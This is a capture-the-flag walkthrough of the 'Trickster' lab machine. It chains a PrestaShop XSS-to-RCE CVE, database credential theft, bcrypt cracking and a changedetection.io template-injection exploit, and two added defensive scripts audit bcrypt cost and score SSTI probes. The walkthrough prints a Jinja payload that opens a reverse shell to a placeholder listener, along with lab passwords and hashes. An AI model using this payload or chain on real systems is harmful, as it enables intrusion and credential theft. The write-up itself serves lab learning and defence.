First of all, you win: not only did you rub it in my face, you also got me reported and banned. Whatever, I was only playing for fun anyway. Points or no points, it doesn't matter; I'm happy to publish the writeup. Unlike certain people who want to play dirty and still claim the moral high ground.
Information gathering

```
start infoscan
10.10.11.34:22 open
10.10.11.34:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.11.34 code:301 len:306 title:301 Moved Permanently 跳转url: http://trickster.htb
```
After adding the hosts entry, scan it.
Subdomain scan

```bash
gobuster vhost -u http://trickster.htb --append-domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -r
```
Add a hosts entry for the shop subdomain.
Scan for files and directories; the -b here excludes the 403 status code.
```bash
gobuster dir -u http://trickster.htb/ -w /usr/share/wordlists/dirb/common.txt -b 403
```
git leak

The shop subdomain also turned up an exposed .git; GitHack pulled it straight down. The root domain had nothing.
```
[OK] admin634ewutrx1jgitlooaj/themes/default/scss/partials/_date-picker.scss
[OK] admin634ewutrx1jgitlooaj/themes/default/scss/partials/_icons.scss
[OK] admin634ewutrx1jgitlooaj/themes/default/scss/partials/_content.scss
```
Found the admin route: admin634ewutrx1jgitlooaj
First I tried to get in directly; that didn't work, but the page hinted at the version: 8.1.5.
GitHub - aelmokhtar/CVE-2024-34716
CVE-2024-34716 – The Deceptive PNG Trap: Breaking Down the PNG-Driven Chain from XSS to Remote Code Execution on PrestaShop (<=8.1.5)
To use this PoC you first need to know an email address, but all the contact-us page on the main site gives is admin@trickster.htb.
Testing with that didn't seem to work, and I was stuck here for a while. Later I found that the config file under the shop.trickster.htb/config route lists a user, so the user should be adam@trickster.htb.
Then I fired the XSS from the CVE; the GitHub project needs a few tweaks for this. It wouldn't go through, and I spent a whole afternoon changing things with no luck. In the end it inexplicably succeeded when I just ran it. Maybe you need to wait a bit; later I found the PoC had been updated and the original PoC simply didn't work. Then switch to a proper shell:
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```
After searching for ages I found the credentials are not in config but in /var/www/prestashop/app/config/parameters.php.
```php
'database_host' => '127.0.0.1',
'database_port' => '',
'database_name' => 'prestashop',
'database_user' => 'ps_user',
'database_password' => 'prest@shop_o',
```
Log in to mysql, then a quick combo finds the password.
```
MariaDB [prestashop]> select * from ps_employee;
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
| id_employee | id_profile | id_lang | lastname | firstname | email | passwd | last_passwd_gen | stats_date_from | stats_date_to | stats_compare_from | stats_compare_to | stats_compare_option | preselect_date_range | bo_color | bo_theme | bo_css | default_tab | bo_width | bo_menu | active | optin | id_last_order | id_last_customer_message | id_last_customer | last_connection_date | reset_password_token | reset_password_validity | has_enabled_gravatar |
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
| 1 | 1 | 1 | Store | Trickster | admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C | 2024-05-25 13:10:20 | 2024-04-25 | 2024-05-25 | 0000-00-00 | 0000-00-00 | 1 | NULL | NULL | default | theme.css | 1 | 0 | 1 | 1 | NULL | 5 | 0 | 0 | 2024-09-27 | NULL | 0000-00-00 00:00:00 | 0 |
| 2 | 2 | 0 | james | james | james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm | 2024-09-09 13:22:42 | NULL | NULL | NULL | NULL | 1 | NULL | NULL | NULL | NULL | 0 | 0 | 1 | 0 | NULL | 0 | 0 | 0 | NULL | NULL | NULL | 0 |
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
```
hashcat's moment to shine:
```bash
hashcat -m 3200 '$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm' /usr/share/wordlists/rockyou.txt
```
```
james@trickster.htb
pass: alwaysandforever
```
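Why james's hash fell to rockyou in seconds while admin's did not is visible in the dump itself: admin's hash is `$2y$10$` (cost 10, 1024 rounds), james's is `$2a$04$` (cost 4, 16 rounds, the minimum bcrypt accepts). The following is an added example, not code from the writeup or from PrestaShop: it parses bcrypt modular-crypt strings, reports the cost factor, and flags every row of a ps_employee-style dump that sits below an audit threshold. The two hashes are the ones shown in the table above; the `SAMPLE_ROWS` list and the threshold of 10 are assumptions for the example.

```python
"""Audit bcrypt cost factors in a dumped employee table (added example)."""
import re
from dataclasses import dataclass

# bcrypt modular-crypt format: $2<variant>$<cost>$<22-char salt><31-char hash>
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{53})$")

# Constructed input for the example: the two (email, passwd) pairs from the ps_employee dump.
SAMPLE_ROWS = [
    ("admin@trickster.htb", "$2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C"),
    ("james@trickster.htb", "$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm"),
]


@dataclass
class BcryptInfo:
    variant: str   # "2a", "2b", "2y" ...
    cost: int      # log2 of the key-expansion rounds
    rounds: int    # 2 ** cost
    weak: bool     # below the audit threshold


def parse_bcrypt(h: str, min_cost: int = 10) -> BcryptInfo:
    """Split a bcrypt string into variant and cost; raise on anything else."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    variant, cost_str, _ = m.groups()
    cost = int(cost_str)
    return BcryptInfo(variant, cost, 2 ** cost, cost < min_cost)


def speedup(weak_cost: int, reference_cost: int) -> int:
    """How many times cheaper a single guess is at weak_cost than at reference_cost."""
    return 2 ** (reference_cost - weak_cost)


def audit(rows, min_cost: int = 10):
    """Return (email, cost) for every row whose bcrypt cost is below min_cost.

    Rows that are not bcrypt at all are reported with cost -1 rather than
    silently skipped, since a non-bcrypt value in this column is itself a finding.
    """
    findings = []
    for email, passwd in rows:
        try:
            info = parse_bcrypt(passwd, min_cost)
        except ValueError:
            findings.append((email, -1))
            continue
        if info.weak:
            findings.append((email, info.cost))
    return findings


if __name__ == "__main__":
    for email, cost in audit(SAMPLE_ROWS):
        print(f"{email}: bcrypt cost {cost}, {speedup(cost, 10)}x cheaper per guess than cost 10")
```

Run against a real dump, `audit` is the query you want in a periodic job: a cost-4 hash set by a migration script or a test fixture looks identical to a proper one in the admin panel and only shows up by parsing the prefix.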
Then log in as james.
ifconfig showed a docker network on this machine, so the first step is finding open ports. Upload fscan and scan:
```
./fscan -h 172.17.0.1/24 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
              fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.17.0.1 is alive
(icmp) Target 172.17.0.2 is alive
[*] Icmp alive hosts len is: 2
172.17.0.1:22 open
172.17.0.1:80 open
172.17.0.2:5000 open
```
There is a service on port 5000; pull it out with an ssh port forward.
```bash
# suggest changing the local port so the next step can be run in one go
ssh james@10.10.11.34 -L 9292:172.17.0.2:5000
```
docker

GitHub - zcrosman/cve-2024-32651: changedetection rce though ssti
CVE-2024-32651 – Server Side Template Injection (Changedetection.io)
alwaysandforever gets you logged in. Then remove the password login in the settings, and either run the script above in one go or follow the second link above and do it by hand.
```jinja
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"listen_ip\",listen_port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")' ").read() }}{% endif %}{% endfor %}
```
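The payload above has a recognisable shape regardless of what it executes: Jinja2 delimiters, a walk through `__class__`/`__base__`/`__subclasses__` to reach `__builtins__`, and an OS sink such as `popen`. Legitimate changedetection.io notification bodies use `{{ ... }}` too, so the delimiters alone are not a signal. The block below is an added example, not code from the writeup or from changedetection.io: it URL-decodes a captured request line, scores it on those three features, and flags lines above a threshold. The `SAMPLE_LINES` are constructed for the example, and the feature weights and the threshold of 3 are assumptions.

```python
"""Score captured requests for Jinja2-style SSTI probes (added example)."""
import re
from urllib.parse import unquote_plus

# Feature 1: template delimiters (also present in benign notification templates).
TEMPLATE_DELIMS = re.compile(r"\{\{|\{%")
# Feature 2: the dunder attributes used to climb from a literal to __builtins__.
DUNDERS = re.compile(r"__(class|base|bases|mro|subclasses|globals|builtins|import|init)__")
# Feature 3: sinks that turn template evaluation into command execution.
EXEC_SINKS = re.compile(r"\b(popen|system|subprocess|eval|exec|import_module)\b")

# Constructed sample lines: a benign template body, an unrelated search query
# containing a dunder, and a URL-encoded probe of the same shape as the payload above.
SAMPLE_LINES = [
    'POST /settings body="notification_body=Change+detected+on+{{watch_url}}"',
    "GET /search?q=__import__ HTTP/1.1",
    'POST /settings body="notification_body=%7B%25+for+x+in+().__class__.__base__.__subclasses__()+%25%7D'
    '%7B%25+if+%22warning%22+in+x.__name__+%25%7D%7B%7B+x()._module.__builtins__%5B%27__import__%27%5D'
    '(%27os%27).popen(%27id%27).read()+%7D%7D%7B%25+endif+%25%7D%7B%25+endfor+%25%7D"',
]


def ssti_score(text: str) -> int:
    """Decode percent-encoding and '+' first, then add up the three features."""
    decoded = unquote_plus(text)
    score = 0
    if TEMPLATE_DELIMS.search(decoded):
        score += 1
    # count distinct dunders, capped so one long payload does not dominate
    score += min(len(set(DUNDERS.findall(decoded))), 3)
    if EXEC_SINKS.search(decoded):
        score += 2
    return score


def flag_lines(lines, threshold: int = 3):
    """Return the lines whose score reaches the threshold, in input order."""
    return [line for line in lines if ssti_score(line) >= threshold]


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(ssti_score(line), line[:60])
```

The benign template and the stray `__import__` both score 1 and stay below the threshold; the probe scores 6 because it carries delimiters, several distinct dunders and a sink together. Decoding before matching matters, since the same payload arrives `%7B%25`-encoded in a form post.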
After that there is an unintended path: root's password can be read from the history file: #YouC4ntCatchMe#. The intended route is apparently a prusa CVE.
Shortcuts

```
USER FLAG
password: alwaysandforever
ROOT FLAG
password:
```